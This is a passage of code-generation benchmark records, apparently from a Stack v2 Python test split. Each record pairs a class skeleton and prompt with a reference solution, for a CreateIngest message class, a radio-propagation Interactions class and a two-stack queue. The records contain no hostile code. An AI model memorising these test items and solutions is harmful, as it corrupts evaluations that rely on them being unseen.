to_json(self):\n \"\"\"See :meth:`messaging.messages.message.CommandMessage.to_json`\"\"\"\n <|body_1|>\n\n def from_json(json_dict):\n \"\"\"See :meth:`messaging.messages.message.CommandMessage.from_json`\"\"\"\n <|body_2|>\n\n def execute(self):\n \"\"\"See :meth:`messaging.messages.message.CommandMessage.execute`\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CreateIngest:\n \"\"\"Command message that creates the ingest job\"\"\"\n\n def __init__(self):\n \"\"\"Constructor\"\"\"\n super(CreateIngest, self).__init__('create_ingest_jobs')\n self.create_ingest_type = None\n self.ingest_id = 
None\n self.scan_id = None\n self.strike_id = None\n\n def to_json(self):\n \"\"\"See :meth:`messaging.messages.message.CommandMessage.to_json`\"\"\"\n json_dict = {'create_ingest_type': self.create_ingest_type, 'ingest_id': self.ingest_id}\n if self.create_ingest_type == STRIKE_JOB_TYPE:\n json_dict['strike_id'] = self.strike_id\n elif self.create_ingest_type == SCAN_JOB_TYPE:\n json_dict['scan_id'] = self.scan_id\n return json_dict\n\n def from_json(json_dict):\n \"\"\"See :meth:`messaging.messages.message.CommandMessage.from_json`\"\"\"\n message = CreateIngest()\n message.create_ingest_type = json_dict['create_ingest_type']\n message.ingest_id = json_dict['ingest_id']\n if message.create_ingest_type == STRIKE_JOB_TYPE:\n message.strike_id = json_dict['strike_id']\n elif message.create_ingest_type == SCAN_JOB_TYPE:\n message.scan_id = json_dict['scan_id']\n return message\n\n def execute(self):\n \"\"\"See :meth:`messaging.messages.message.CommandMessage.execute`\"\"\"\n from ingest.models import Ingest\n ingest_job_type = Ingest.objects.get_ingest_job_type()\n ingest = Ingest.objects.get(pk=self.ingest_id)\n when = ingest.transfer_ended if ingest.transfer_ended else now()\n desc = {'file_name': ingest.file_name}\n event = None\n ingest_id = ingest.id\n with transaction.atomic():\n if self.create_ingest_type == STRIKE_JOB_TYPE:\n desc['strike_id'] = self.strike_id\n event = TriggerEvent.objects.create_trigger_event('STRIKE_TRANSFER', None, desc, when)\n elif self.create_ingest_type == SCAN_JOB_TYPE:\n ingest_id = Ingest.objects.get(scan_id=self.scan_id, file_name=ingest.file_name).id\n desc['scan_id'] = self.scan_id\n event = TriggerEvent.objects.create_trigger_event('SCAN_TRANSFER', None, desc, when)\n data = Data()\n data.add_value(JsonValue('ingest_id', ingest_id))\n data.add_value(JsonValue('workspace', ingest.workspace.name))\n if ingest.new_workspace:\n data.add_value(JsonValue('new_workspace', ingest.new_workspace.name))\n ingest_job = None\n with transaction.atomic():\n ingest_job = Queue.objects.queue_new_job_v6(ingest_job_type, data, event)\n ingest.job = ingest_job\n ingest.status = 'QUEUED'\n ingest.save()\n job = Job.objects.get_details(ingest_job.id)\n self.new_messages.extend(create_process_job_input_messages([job.id]))\n return True\n", "source": "the_stack_v2_python_sparse", "source_path": "scale/ingest/messages/create_ingest_jobs.py", "source_repo": "kfconsultant/scale", "split": "test", "star_events_count": 0} {"blob_id": "3aedabadd9652e25b37713f09f9db2f95aab1c83", "bodies": ["Inter.__init__(self, slab=slab)\nself['B'] = []\nself['L'] = []\nself[''] = []\nself['T'] = []\nself['D'] = []\nself.evaluated = False\nself.nimax = 0", "for i in li:\n if i.idx != []:\n self.nimax = max(self.nimax, max(i.idx)) + 1\nfor i in li:\n self.addi(i)", "if not isinstance(self.typ, np.ndarray):\n self.typ = np.zeros(self.nimax, dtype=str)\nif i.typ == -1:\n self.B = i\n self['B'] = i.idx\n self.typ[i.idx] = 'B'\nif i.typ == 0:\n self.L = i\n self['L'] = i.idx\n self.typ[i.idx] = 'L'\nif i.typ == 1:\n self.D = i\n self['D'] = i.idx\n self.typ[i.idx] = 'D'\nif i.typ == 2:\n self.R = i\n self['R'] = i.idx\n self.typ[i.idx] = 'R'\nif i.typ == 3:\n self.T = i\n self['T'] = i.idx\n self.typ[i.idx] = 'T'", "self.fGHz = fGHz\nself.nf = len(fGHz)\nself.I = np.zeros((self.nf, self.nimax, 3, 3), dtype=complex)\nself.sout = np.zeros(self.nimax)\nself.si0 = np.zeros(self.nimax)\nself.alpha = np.ones(self.nimax, dtype=complex)\nself.gamma = np.ones(self.nimax, dtype=complex)\nif len(self.R.data) != 
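The `CreateIngest` record that closes on this line is a clean example of the command-message round-trip contract: `to_json` and `from_json` must mirror each other field-for-field, including the type-dependent `strike_id`/`scan_id` keys. Note that `from_json` is declared without `self` and without a `@staticmethod` decorator in the source, so it only works when called on the class itself. A self-contained sketch of the round trip, with stand-in values for the `STRIKE_JOB_TYPE`/`SCAN_JOB_TYPE` constants the record assumes, and the `CommandMessage` base class (whose constructor takes `'create_ingest_jobs'`) dropped:

# Self-contained sketch of the to_json/from_json round-trip contract.
STRIKE_JOB_TYPE = 'strike'   # stand-in constant, not the record's value
SCAN_JOB_TYPE = 'scan'       # stand-in constant, not the record's value

class CreateIngest:
    def __init__(self):
        self.create_ingest_type = None
        self.ingest_id = None
        self.scan_id = None
        self.strike_id = None

    def to_json(self):
        json_dict = {'create_ingest_type': self.create_ingest_type,
                     'ingest_id': self.ingest_id}
        if self.create_ingest_type == STRIKE_JOB_TYPE:
            json_dict['strike_id'] = self.strike_id
        elif self.create_ingest_type == SCAN_JOB_TYPE:
            json_dict['scan_id'] = self.scan_id
        return json_dict

    @staticmethod  # implied by the record's self-less signature
    def from_json(json_dict):
        message = CreateIngest()
        message.create_ingest_type = json_dict['create_ingest_type']
        message.ingest_id = json_dict['ingest_id']
        if message.create_ingest_type == STRIKE_JOB_TYPE:
            message.strike_id = json_dict['strike_id']
        elif message.create_ingest_type == SCAN_JOB_TYPE:
            message.scan_id = json_dict['scan_id']
        return message

# Round trip preserves every serialized field.
m = CreateIngest()
m.create_ingest_type, m.ingest_id, m.scan_id = SCAN_JOB_TYPE, 7, 3
assert CreateIngest.from_json(m.to_json()).to_json() == m.to_json()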
0:\n self.I[:, self.R.idx, :, :] = self.R.eval(fGHz=fGHz)\n self.sout[self.R.idx] = self.R.sout\n self.si0[self.R.idx] = self.R.si0\n self.alpha[self.R.idx] = self.R.alpha\n self.gamma[self.R.idx] = self.R.gamma\nif len(self.T.data) != 0:\n self.I[:, self.T.idx, :, :] = self.T.eval(fGHz=fGHz)\n self.sout[self.T.idx] = self.T.sout\n self.si0[self.T.idx] = self.T.si0\n self.alpha[self.T.idx] = self.T.alpha\n self.gamma[self.T.idx] = self.T.gamma\nif len(self.D.data) != 0:\n self.I[:, self.D.idx, :, :] = self.D.eval(fGHz=fGHz)\n self.sout[self.D.idx] = self.D.sout\n self.si0[self.D.idx] = self.D.si0\nself.evaluated = True"], "bodies_text": "<|body_start_0|>\n Inter.__init__(self, slab=slab)\n self['B'] = []\n self['L'] = []\n self[''] = []\n self['T'] = []\n self['D'] = []\n self.evaluated = False\n self.nimax = 0\n<|end_body_0|>\n\n<|body_start_1|>\n for i in li:\n if i.idx != []:\n self.nimax = max(self.nimax, max(i.idx)) + 1\n for i in li:\n self.addi(i)\n<|end_body_1|>\n\n<|body_start_2|>\n if not isinstance(self.typ, np.ndarray):\n self.typ = np.zeros(self.nimax, dtype=str)\n if i.typ == -1:\n self.B = i\n self['B'] = i.idx\n self.typ[i.idx] = 'B'\n if i.typ == 0:\n self.L = i\n self['L'] = i.idx\n self.typ[i.idx] = 'L'\n if i.typ == 1:\n self.D = i\n self['D'] = i.idx\n self.typ[i.idx] = 'D'\n if i.typ == 2:\n self.R = i\n self['R'] = i.idx\n self.typ[i.idx] = 'R'\n if i.typ == 3:\n self.T = i\n self['T'] = i.idx\n self.typ[i.idx] = 'T'\n<|end_body_2|>\n\n<|body_start_3|>\n self.fGHz = fGHz\n self.nf = len(fGHz)\n self.I = np.zeros((self.nf, self.nimax, 3, 3), dtype=complex)\n self.sout = np.zeros(self.nimax)\n self.si0 = np.zeros(self.nimax)\n self.alpha = np.ones(self.nimax, dtype=complex)\n self.gamma = np.ones(self.nimax, dtype=complex)\n if len(self.R.data) != 0:\n self.I[:, self.R.idx, :, :] = self.R.eval(fGHz=fGHz)\n self.sout[self.R.idx] = self.R.sout\n self.si0[self.R.idx] = self.R.si0\n self.alpha[self.R.idx] = self.R.alpha\n self.gamma[self.R.idx] = self.R.gamma\n if len(self.T.data) != 0:\n self.I[:, self.T.idx, :, :] = self.T.eval(fGHz=fGHz)\n self.sout[self.T.idx] = self.T.sout\n self.si0[self.T.idx] = self.T.si0\n self.alpha[self.T.idx] = self.T.alpha\n self.gamma[self.T.idx] = self.T.gamma\n if len(self.D.data) != 0:\n self.I[:, self.D.idx, :, :] = self.D.eval(fGHz=fGHz)\n self.sout[self.D.idx] = self.D.sout\n self.si0[self.D.idx] = self.D.si0\n self.evaluated = True\n<|end_body_3|>\n", "class_docstring": "Interaction parameters gather all type of interactions (IntB/L/R/T) Methods ------- add(self,li): add a list of basis interactions addi(self,i): add a single interaction eval(self) : evaluate all the interactions added thanks to self.add or self.addi and create the self.I which gather all thoses interactions 5 following types of interactions B : local basis transformation matrix (unitary) L : LOS case R : Reflection T : Transmission D : Diffraction", "class_name": "Interactions", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Interactions:\n \"\"\"Interaction parameters gather all type of interactions (IntB/L/R/T) Methods ------- add(self,li): add a list of basis interactions addi(self,i): add a single interaction eval(self) : evaluate all the interactions added thanks to self.add or self.addi and create the self.I which gather all thoses interactions 5 following types of interactions B : local basis transformation matrix (unitary) L : LOS case R : Reflection T : Transmission D : 
Diffraction\"\"\"\n\n def __init__(self, slab={}):\n \"\"\"object constructor\"\"\"\n <|body_0|>\n\n def add(self, li):\n \"\"\"add a list of interactions Parameters ---------- li : list list of interactions\"\"\"\n <|body_1|>\n\n def addi(self, i):\n \"\"\"add interactions into Interactions class Parameters ---------- i : Inter object\"\"\"\n <|body_2|>\n\n def eval(self, fGHz=np.array([2.4])):\n \"\"\"evaluate all the interactions Parameters ---------- fGHz : np.array() Notes ----- self.I : np.shape(self.I) = (self.nf,self.nimax,2,2) with self.nf : number of frequences self.nimax : the total number of interactions ( of all rays) self.sout : distance from one interaction to the next one self.si0 : distance from the previous interaction to the one self.alpha : alpha as described in JFL Thesis self.gamma : !! gamma**2 !!! (squared included) as described\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n Inter.__init__(self, slab=slab)\n self['B'] = []\n self['L'] = []\n self[''] = []\n self['T'] = []\n self['D'] = []\n self.evaluated = False\n self.nimax = 0\n<|end_body_0|>\n\n<|body_start_1|>\n for i in li:\n if i.idx != []:\n self.nimax = max(self.nimax, max(i.idx)) + 1\n for i in li:\n self.addi(i)\n<|end_body_1|>\n\n<|body_start_2|>\n if not isinstance(self.typ, np.ndarray):\n self.typ = np.zeros(self.nimax, dtype=str)\n if i.typ == -1:\n self.B = i\n self['B'] = i.idx\n self.typ[i.idx] = 'B'\n if i.typ == 0:\n self.L = i\n self['L'] = i.idx\n self.typ[i.idx] = 'L'\n if i.typ == 1:\n self.D = i\n self['D'] = i.idx\n self.typ[i.idx] = 'D'\n if i.typ == 2:\n self.R = i\n self['R'] = i.idx\n self.typ[i.idx] = 'R'\n if i.typ == 3:\n self.T = i\n self['T'] = i.idx\n self.typ[i.idx] = 'T'\n<|end_body_2|>\n\n<|body_start_3|>\n self.fGHz = fGHz\n self.nf = len(fGHz)\n self.I = np.zeros((self.nf, self.nimax, 3, 3), dtype=complex)\n self.sout = np.zeros(self.nimax)\n self.si0 = np.zeros(self.nimax)\n self.alpha = np.ones(self.nimax, dtype=complex)\n self.gamma = np.ones(self.nimax, dtype=complex)\n if len(self.R.data) != 0:\n self.I[:, self.R.idx, :, :] = self.R.eval(fGHz=fGHz)\n self.sout[self.R.idx] = self.R.sout\n self.si0[self.R.idx] = self.R.si0\n self.alpha[self.R.idx] = self.R.alpha\n self.gamma[self.R.idx] = self.R.gamma\n if len(self.T.data) != 0:\n self.I[:, self.T.idx, :, :] = self.T.eval(fGHz=fGHz)\n self.sout[self.T.idx] = self.T.sout\n self.si0[self.T.idx] = self.T.si0\n self.alpha[self.T.idx] = self.T.alpha\n self.gamma[self.T.idx] = self.T.gamma\n if len(self.D.data) != 0:\n self.I[:, self.D.idx, :, :] = self.D.eval(fGHz=fGHz)\n self.sout[self.D.idx] = self.D.sout\n self.si0[self.D.idx] = self.D.si0\n self.evaluated = True\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000294", "length_bytes": 25448, "license_type": "permissive", "methods": [{"docstring": "object constructor", "name": "__init__", "signature": "def __init__(self, slab={})"}, {"docstring": "add a list of interactions Parameters ---------- li : list list of interactions", "name": "add", "signature": "def add(self, li)"}, {"docstring": "add interactions into Interactions class Parameters ---------- i : Inter object", "name": "addi", "signature": "def addi(self, i)"}, {"docstring": "evaluate all the interactions Parameters ---------- fGHz : np.array() Notes ----- self.I : np.shape(self.I) = (self.nf,self.nimax,2,2) with self.nf : number of frequences self.nimax : the total number of interactions ( of all rays) self.sout : distance from one interaction to the next one self.si0 : distance from the 
previous interaction to the one self.alpha : alpha as described in JFL Thesis self.gamma : !! gamma**2 !!! (squared included) as described", "name": "eval", "signature": "def eval(self, fGHz=np.array([2.4]))"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_003862", "prompt": "Implement the Python class `Interactions` described below.\n\nClass description:\nInteraction parameters gather all type of interactions (IntB/L/R/T) Methods ------- add(self,li): add a list of basis interactions addi(self,i): add a single interaction eval(self) : evaluate all the interactions added thanks to self.add or self.addi and create the self.I which gather all thoses interactions 5 following types of interactions B : local basis transformation matrix (unitary) L : LOS case R : Reflection T : Transmission D : Diffraction\n\nMethod signatures and docstrings:\n- def __init__(self, slab={}): object constructor\n- def add(self, li): add a list of interactions Parameters ---------- li : list list of interactions\n- def addi(self, i): add interactions into Interactions class Parameters ---------- i : Inter object\n- def eval(self, fGHz=np.array([2.4])): evaluate all the interactions Parameters ---------- fGHz : np.array() Notes ----- self.I : np.shape(self.I) = (self.nf,self.nimax,2,2) with self.nf : number of frequences self.nimax : the total number of interactions ( of all rays) self.sout : distance from one interaction to the next one self.si0 : distance from the previous interaction to the one self.alpha : alpha as described in JFL Thesis self.gamma : !! gamma**2 !!! (squared included) as described", "prompted_full_text": "Implement the Python class `Interactions` described below.\n\nClass description:\nInteraction parameters gather all type of interactions (IntB/L/R/T) Methods ------- add(self,li): add a list of basis interactions addi(self,i): add a single interaction eval(self) : evaluate all the interactions added thanks to self.add or self.addi and create the self.I which gather all thoses interactions 5 following types of interactions B : local basis transformation matrix (unitary) L : LOS case R : Reflection T : Transmission D : Diffraction\n\nMethod signatures and docstrings:\n- def __init__(self, slab={}): object constructor\n- def add(self, li): add a list of interactions Parameters ---------- li : list list of interactions\n- def addi(self, i): add interactions into Interactions class Parameters ---------- i : Inter object\n- def eval(self, fGHz=np.array([2.4])): evaluate all the interactions Parameters ---------- fGHz : np.array() Notes ----- self.I : np.shape(self.I) = (self.nf,self.nimax,2,2) with self.nf : number of frequences self.nimax : the total number of interactions ( of all rays) self.sout : distance from one interaction to the next one self.si0 : distance from the previous interaction to the one self.alpha : alpha as described in JFL Thesis self.gamma : !! gamma**2 !!! 
(squared included) as described\n\n<|skeleton|>\nclass Interactions:\n \"\"\"Interaction parameters gather all type of interactions (IntB/L/R/T) Methods ------- add(self,li): add a list of basis interactions addi(self,i): add a single interaction eval(self) : evaluate all the interactions added thanks to self.add or self.addi and create the self.I which gather all thoses interactions 5 following types of interactions B : local basis transformation matrix (unitary) L : LOS case R : Reflection T : Transmission D : Diffraction\"\"\"\n\n def __init__(self, slab={}):\n \"\"\"object constructor\"\"\"\n <|body_0|>\n\n def add(self, li):\n \"\"\"add a list of interactions Parameters ---------- li : list list of interactions\"\"\"\n <|body_1|>\n\n def addi(self, i):\n \"\"\"add interactions into Interactions class Parameters ---------- i : Inter object\"\"\"\n <|body_2|>\n\n def eval(self, fGHz=np.array([2.4])):\n \"\"\"evaluate all the interactions Parameters ---------- fGHz : np.array() Notes ----- self.I : np.shape(self.I) = (self.nf,self.nimax,2,2) with self.nf : number of frequences self.nimax : the total number of interactions ( of all rays) self.sout : distance from one interaction to the next one self.si0 : distance from the previous interaction to the one self.alpha : alpha as described in JFL Thesis self.gamma : !! gamma**2 !!! (squared included) as described\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n Inter.__init__(self, slab=slab)\n self['B'] = []\n self['L'] = []\n self[''] = []\n self['T'] = []\n self['D'] = []\n self.evaluated = False\n self.nimax = 0\n<|end_body_0|>\n\n<|body_start_1|>\n for i in li:\n if i.idx != []:\n self.nimax = max(self.nimax, max(i.idx)) + 1\n for i in li:\n self.addi(i)\n<|end_body_1|>\n\n<|body_start_2|>\n if not isinstance(self.typ, np.ndarray):\n self.typ = np.zeros(self.nimax, dtype=str)\n if i.typ == -1:\n self.B = i\n self['B'] = i.idx\n self.typ[i.idx] = 'B'\n if i.typ == 0:\n self.L = i\n self['L'] = i.idx\n self.typ[i.idx] = 'L'\n if i.typ == 1:\n self.D = i\n self['D'] = i.idx\n self.typ[i.idx] = 'D'\n if i.typ == 2:\n self.R = i\n self['R'] = i.idx\n self.typ[i.idx] = 'R'\n if i.typ == 3:\n self.T = i\n self['T'] = i.idx\n self.typ[i.idx] = 'T'\n<|end_body_2|>\n\n<|body_start_3|>\n self.fGHz = fGHz\n self.nf = len(fGHz)\n self.I = np.zeros((self.nf, self.nimax, 3, 3), dtype=complex)\n self.sout = np.zeros(self.nimax)\n self.si0 = np.zeros(self.nimax)\n self.alpha = np.ones(self.nimax, dtype=complex)\n self.gamma = np.ones(self.nimax, dtype=complex)\n if len(self.R.data) != 0:\n self.I[:, self.R.idx, :, :] = self.R.eval(fGHz=fGHz)\n self.sout[self.R.idx] = self.R.sout\n self.si0[self.R.idx] = self.R.si0\n self.alpha[self.R.idx] = self.R.alpha\n self.gamma[self.R.idx] = self.R.gamma\n if len(self.T.data) != 0:\n self.I[:, self.T.idx, :, :] = self.T.eval(fGHz=fGHz)\n self.sout[self.T.idx] = self.T.sout\n self.si0[self.T.idx] = self.T.si0\n self.alpha[self.T.idx] = self.T.alpha\n self.gamma[self.T.idx] = self.T.gamma\n if len(self.D.data) != 0:\n self.I[:, self.D.idx, :, :] = self.D.eval(fGHz=fGHz)\n self.sout[self.D.idx] = self.D.sout\n self.si0[self.D.idx] = self.D.si0\n self.evaluated = True\n<|end_body_3|>\n", "revision_id": "a3a5973a0cb549d0a16f17b96a9c78c200cf0c7e", "skeleton": "<|skeleton|>\nclass Interactions:\n \"\"\"Interaction parameters gather all type of interactions (IntB/L/R/T) Methods ------- add(self,li): add a list of basis interactions addi(self,i): add a single interaction eval(self) : evaluate all the interactions 
added thanks to self.add or self.addi and create the self.I which gather all thoses interactions 5 following types of interactions B : local basis transformation matrix (unitary) L : LOS case R : Reflection T : Transmission D : Diffraction\"\"\"\n\n def __init__(self, slab={}):\n \"\"\"object constructor\"\"\"\n <|body_0|>\n\n def add(self, li):\n \"\"\"add a list of interactions Parameters ---------- li : list list of interactions\"\"\"\n <|body_1|>\n\n def addi(self, i):\n \"\"\"add interactions into Interactions class Parameters ---------- i : Inter object\"\"\"\n <|body_2|>\n\n def eval(self, fGHz=np.array([2.4])):\n \"\"\"evaluate all the interactions Parameters ---------- fGHz : np.array() Notes ----- self.I : np.shape(self.I) = (self.nf,self.nimax,2,2) with self.nf : number of frequences self.nimax : the total number of interactions ( of all rays) self.sout : distance from one interaction to the next one self.si0 : distance from the previous interaction to the one self.alpha : alpha as described in JFL Thesis self.gamma : !! gamma**2 !!! (squared included) as described\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Interactions:\n \"\"\"Interaction parameters gather all type of interactions (IntB/L/R/T) Methods ------- add(self,li): add a list of basis interactions addi(self,i): add a single interaction eval(self) : evaluate all the interactions added thanks to self.add or self.addi and create the self.I which gather all thoses interactions 5 following types of interactions B : local basis transformation matrix (unitary) L : LOS case R : Reflection T : Transmission D : Diffraction\"\"\"\n\n def __init__(self, slab={}):\n \"\"\"object constructor\"\"\"\n Inter.__init__(self, slab=slab)\n self['B'] = []\n self['L'] = []\n self[''] = []\n self['T'] = []\n self['D'] = []\n self.evaluated = False\n self.nimax = 0\n\n def add(self, li):\n \"\"\"add a list of interactions Parameters ---------- li : list list of interactions\"\"\"\n for i in li:\n if i.idx != []:\n self.nimax = max(self.nimax, max(i.idx)) + 1\n for i in li:\n self.addi(i)\n\n def addi(self, i):\n \"\"\"add interactions into Interactions class Parameters ---------- i : Inter object\"\"\"\n if not isinstance(self.typ, np.ndarray):\n self.typ = np.zeros(self.nimax, dtype=str)\n if i.typ == -1:\n self.B = i\n self['B'] = i.idx\n self.typ[i.idx] = 'B'\n if i.typ == 0:\n self.L = i\n self['L'] = i.idx\n self.typ[i.idx] = 'L'\n if i.typ == 1:\n self.D = i\n self['D'] = i.idx\n self.typ[i.idx] = 'D'\n if i.typ == 2:\n self.R = i\n self['R'] = i.idx\n self.typ[i.idx] = 'R'\n if i.typ == 3:\n self.T = i\n self['T'] = i.idx\n self.typ[i.idx] = 'T'\n\n def eval(self, fGHz=np.array([2.4])):\n \"\"\"evaluate all the interactions Parameters ---------- fGHz : np.array() Notes ----- self.I : np.shape(self.I) = (self.nf,self.nimax,2,2) with self.nf : number of frequences self.nimax : the total number of interactions ( of all rays) self.sout : distance from one interaction to the next one self.si0 : distance from the previous interaction to the one self.alpha : alpha as described in JFL Thesis self.gamma : !! gamma**2 !!! 
(squared included) as described\"\"\"\n self.fGHz = fGHz\n self.nf = len(fGHz)\n self.I = np.zeros((self.nf, self.nimax, 3, 3), dtype=complex)\n self.sout = np.zeros(self.nimax)\n self.si0 = np.zeros(self.nimax)\n self.alpha = np.ones(self.nimax, dtype=complex)\n self.gamma = np.ones(self.nimax, dtype=complex)\n if len(self.R.data) != 0:\n self.I[:, self.R.idx, :, :] = self.R.eval(fGHz=fGHz)\n self.sout[self.R.idx] = self.R.sout\n self.si0[self.R.idx] = self.R.si0\n self.alpha[self.R.idx] = self.R.alpha\n self.gamma[self.R.idx] = self.R.gamma\n if len(self.T.data) != 0:\n self.I[:, self.T.idx, :, :] = self.T.eval(fGHz=fGHz)\n self.sout[self.T.idx] = self.T.sout\n self.si0[self.T.idx] = self.T.si0\n self.alpha[self.T.idx] = self.T.alpha\n self.gamma[self.T.idx] = self.T.gamma\n if len(self.D.data) != 0:\n self.I[:, self.D.idx, :, :] = self.D.eval(fGHz=fGHz)\n self.sout[self.D.idx] = self.D.sout\n self.si0[self.D.idx] = self.D.si0\n self.evaluated = True\n", "source": "the_stack_v2_python_sparse", "source_path": "pylayers/antprop/interactions.py", "source_repo": "sahibdhanjal/DeepLocNet", "split": "test", "star_events_count": 40} {"blob_id": "f87425751fa98f2c33671d5fa3caa80064e6460f", "bodies": ["self.s1 = []\nself.s2 = []\nself.front = None", "if not self.s1:\n self.front = x\nself.s1.append(x)", "if not self.s2:\n while self.s1:\n self.s2.append(self.s1.pop())\nreturn self.s2.pop()", "if self.s2:\n return self.s2[-1]\nreturn self.front", "if not self.s1 and (not self.s2):\n return True\nreturn False"], "bodies_text": "<|body_start_0|>\n self.s1 = []\n self.s2 = []\n self.front = None\n<|end_body_0|>\n\n<|body_start_1|>\n if not self.s1:\n self.front = x\n self.s1.append(x)\n<|end_body_1|>\n\n<|body_start_2|>\n if not self.s2:\n while self.s1:\n self.s2.append(self.s1.pop())\n return self.s2.pop()\n<|end_body_2|>\n\n<|body_start_3|>\n if self.s2:\n return self.s2[-1]\n return self.front\n<|end_body_3|>\n\n<|body_start_4|>\n if not self.s1 and (not self.s2):\n return True\n return False\n<|end_body_4|>\n", "class_docstring": "", "class_name": "MyQueue", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MyQueue:\n\n def __init__(self):\n \"\"\"Initialize your data structure here.\"\"\"\n <|body_0|>\n\n def push(self, x: int) -> None:\n \"\"\"Push element x to the back of queue.\"\"\"\n <|body_1|>\n\n def pop(self) -> int:\n \"\"\"Removes the element from in front of queue and returns that element.\"\"\"\n <|body_2|>\n\n def peek(self) -> int:\n \"\"\"Get the front element.\"\"\"\n <|body_3|>\n\n def empty(self) -> bool:\n \"\"\"Returns whether the queue is empty.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.s1 = []\n self.s2 = []\n self.front = None\n<|end_body_0|>\n\n<|body_start_1|>\n if not self.s1:\n self.front = x\n self.s1.append(x)\n<|end_body_1|>\n\n<|body_start_2|>\n if not self.s2:\n while self.s1:\n self.s2.append(self.s1.pop())\n return self.s2.pop()\n<|end_body_2|>\n\n<|body_start_3|>\n if self.s2:\n return self.s2[-1]\n return self.front\n<|end_body_3|>\n\n<|body_start_4|>\n if not self.s1 and (not self.s2):\n return True\n return False\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000295", "length_bytes": 3995, "license_type": "no_license", "methods": [{"docstring": "Initialize your data structure here.", "name": "__init__", "signature": "def __init__(self)"}, {"docstring": "Push element x to the back of queue.", "name": "push", "signature": "def push(self, x: int) -> None"}, 
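Two observations on the `Interactions` record ending above: the constructor initializes a `self['']` bucket where `self['R']` is presumably intended (the reflection bucket only comes into existence once `addi` runs with `i.typ == 2`), and `eval` scatters each interaction type's evaluated 3x3 matrices into one shared (nf, nimax, 3, 3) array by global index. The scatter pattern in isolation, with synthetic data:

# Scatter pattern from Interactions.eval(): each interaction type holds a
# list of global indices, and its evaluated 3x3 matrices are written into
# one shared (nf, nimax, 3, 3) array at those indices. Data is synthetic;
# shapes follow the record.
import numpy as np

nf, nimax = 2, 5                          # frequencies, total interactions
I = np.zeros((nf, nimax, 3, 3), dtype=complex)

r_idx = [0, 3]                            # e.g. reflection interactions
t_idx = [1, 2, 4]                         # e.g. transmission interactions
I[:, r_idx, :, :] = 1.0                   # stand-in for self.R.eval(fGHz)
I[:, t_idx, :, :] = 2.0                   # stand-in for self.T.eval(fGHz)

assert I[0, 3, 0, 0] == 1.0 and I[1, 4, 0, 0] == 2.0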
{"docstring": "Removes the element from in front of queue and returns that element.", "name": "pop", "signature": "def pop(self) -> int"}, {"docstring": "Get the front element.", "name": "peek", "signature": "def peek(self) -> int"}, {"docstring": "Returns whether the queue is empty.", "name": "empty", "signature": "def empty(self) -> bool"}], "n_methods": 5, "prompt": "Implement the Python class `MyQueue` described below.\n\nClass description:\nImplement the MyQueue class.\n\nMethod signatures and docstrings:\n- def __init__(self): Initialize your data structure here.\n- def push(self, x: int) -> None: Push element x to the back of queue.\n- def pop(self) -> int: Removes the element from in front of queue and returns that element.\n- def peek(self) -> int: Get the front element.\n- def empty(self) -> bool: Returns whether the queue is empty.", "prompted_full_text": "Implement the Python class `MyQueue` described below.\n\nClass description:\nImplement the MyQueue class.\n\nMethod signatures and docstrings:\n- def __init__(self): Initialize your data structure here.\n- def push(self, x: int) -> None: Push element x to the back of queue.\n- def pop(self) -> int: Removes the element from in front of queue and returns that element.\n- def peek(self) -> int: Get the front element.\n- def empty(self) -> bool: Returns whether the queue is empty.\n\n<|skeleton|>\nclass MyQueue:\n\n def __init__(self):\n \"\"\"Initialize your data structure here.\"\"\"\n <|body_0|>\n\n def push(self, x: int) -> None:\n \"\"\"Push element x to the back of queue.\"\"\"\n <|body_1|>\n\n def pop(self) -> int:\n \"\"\"Removes the element from in front of queue and returns that element.\"\"\"\n <|body_2|>\n\n def peek(self) -> int:\n \"\"\"Get the front element.\"\"\"\n <|body_3|>\n\n def empty(self) -> bool:\n \"\"\"Returns whether the queue is empty.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.s1 = []\n self.s2 = []\n self.front = None\n<|end_body_0|>\n\n<|body_start_1|>\n if not self.s1:\n self.front = x\n self.s1.append(x)\n<|end_body_1|>\n\n<|body_start_2|>\n if not self.s2:\n while self.s1:\n self.s2.append(self.s1.pop())\n return self.s2.pop()\n<|end_body_2|>\n\n<|body_start_3|>\n if self.s2:\n return self.s2[-1]\n return self.front\n<|end_body_3|>\n\n<|body_start_4|>\n if not self.s1 and (not self.s2):\n return True\n return False\n<|end_body_4|>\n", "revision_id": "2e68822e82df37e8347a7c16616a0a99a8075c3f", "skeleton": "<|skeleton|>\nclass MyQueue:\n\n def __init__(self):\n \"\"\"Initialize your data structure here.\"\"\"\n <|body_0|>\n\n def push(self, x: int) -> None:\n \"\"\"Push element x to the back of queue.\"\"\"\n <|body_1|>\n\n def pop(self) -> int:\n \"\"\"Removes the element from in front of queue and returns that element.\"\"\"\n <|body_2|>\n\n def peek(self) -> int:\n \"\"\"Get the front element.\"\"\"\n <|body_3|>\n\n def empty(self) -> bool:\n \"\"\"Returns whether the queue is empty.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MyQueue:\n def __init__(self):\n \"\"\"Initialize your data structure here.\"\"\"\n self.s1 = []\n self.s2 = []\n self.front = None\n\n def push(self, x: int) -> None:\n \"\"\"Push element x to the back of queue.\"\"\"\n if not self.s1:\n self.front = x\n self.s1.append(x)\n\n def pop(self) -> int:\n \"\"\"Removes the element from in front of queue and returns that element.\"\"\"\n if not self.s2:\n while self.s1:\n 
